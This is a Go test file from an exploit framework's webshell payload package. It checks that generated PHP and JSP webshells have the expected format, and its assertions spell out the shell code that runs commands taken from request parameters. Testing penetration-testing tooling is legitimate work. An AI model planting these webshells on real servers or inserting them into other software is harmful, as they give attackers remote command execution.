package webshell_test

import (
	"strings"
	"testing"

	"github.com/vulncheck-oss/go-exploit/payload/webshell"
)

func TestVerySmallHTTPGET(t *testing.T) {
	shell, param := webshell.PHP.MinimalGet()
	if !strings.HasPrefix(shell, "<?=`$_GET[") {
		t.Fatal("PHP Minimal GET payload is in an unexpected format.")
	}
	if !strings.HasSuffix(shell, "]`?>") {
		t.Fatal("PHP Minimal GET payload is in an unexpected format.")
	}
	if len(param) != 8 {
		t.Fatal("PHP Minimal GET payload is in an unexpected format.")
	}
}

func TestJSPWebshell(t *testing.T) {
	key := "VULNCHECKWUZHERE"
	jsp := webshell.JSP.GetKeyed(key)
	// Look for superfluous %s
	if strings.Contains(jsp, `%%`) {
		t.Fatal("JSP payload is in an unexpected format")
	}
	if !strings.Contains(jsp, `<%@ page import="java.io.*"%>`) {
		t.Fatal("JSP payload is in an unexpected format")
	}
	if !strings.Contains(jsp, `(request.getParameter("VULNCHECKWUZHERE") != null)`) {
		t.Fatal("JSP payload is in an unexpected format")
	}
	if !strings.Contains(jsp, `Process p = Runtime.getRuntime().exec(request.getParameter("VULNCHECKWUZHERE"));`) {
		t.Fatal("JSP payload is in an unexpected format")
	}
}

func TestJSPWebshellMinimal(t *testing.T) {
	key := "hacktheplanet"
	jsp := webshell.JSP.GetKeyedMinimal(key)
	// Look for superfluous %s
	if strings.Contains(jsp, `%%`) {
		t.Fatal("JSP payload is in an unexpected format")
	}
	if strings.Compare(jsp, `<%Runtime.getRuntime().exec(request.getParameter("hacktheplanet"));%>`) != 0 {
		t.Fatal("JSP payload is in an unexpected format")
	}
}
